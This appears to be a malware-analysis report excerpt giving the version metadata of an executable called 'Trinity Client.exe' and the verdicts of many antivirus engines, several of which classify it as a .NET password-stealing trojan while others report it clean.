StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Trinity Client
FileVersion
1.0.0.0
InternalName
Trinity Client.exe
LegalCopyright
Copyright
2021
LegalTrademarks
OriginalFilename
Trinity Client.exe
ProductName
Trinity Client
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature
Bkav Clean
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Bulz.424736
FireEye Generic.mg.ac2b7f66f2c5fe32
CAT-QuickHeal Trojan.YakbeexMSIL.ZZ4
ALYac Gen:Variant.Bulz.424736
Cylance Clean
VIPRE Clean
AegisLab Clean
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan ( 0057a20e1 )
BitDefender Gen:Variant.Bulz.424736
K7GW Trojan ( 0057a20e1 )
Cybereason malicious.b65555
Baidu Clean
Cyren Clean
Symantec Clean
ESET-NOD32 a variant of MSIL/PSW.Agent.RXP
APEX Malicious
Avast Clean
ClamAV Clean
Kaspersky Clean
Alibaba Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Stealer.Agent!1.D483 (CLASSIC)
Ad-Aware Gen:Variant.Bulz.424736
Emsisoft Gen:Variant.Bulz.424736 (B)
Comodo Clean
F-Secure Clean
DrWeb Trojan.PWS.StealerNET.74
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Fareit-FWC!AC2B7F66F2C5
CMC Clean
Sophos Clean
SentinelOne Static AI - Malicious PE
GData MSIL.Trojan-Stealer.DataStealer.B
Jiangmin Clean
Webroot Clean
Avira Clean
MAX malware (ai score=88)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Trojan.Win32.Agent.sd!ni
Arcabit Trojan.Bulz.D67B20
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft PWS:MSIL/StormKitty.GA!MTB
Cynet Malicious (score: 100)
AhnLab-V3 Clean
Acronis Clean
McAfee Fareit-FWC!AC2B7F66F2C5
TACHYON Clean
VBA32 Clean
Malwarebytes Spyware.TrinityStealer
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Clean
Yandex Clean
Ikarus Trojan.MSIL.Spy
eGambit Clean
Fortinet MSIL/Bulz.82555!tr
BitDefenderTheta Gen:NN.ZemsilF.34722.gm0@aq7b4Ld
Qihoo-360 Clean
Paloalto Clean
CrowdStrike Clean
MaxSecure Trojan.Malware.300983.susgen
No IRMA results available.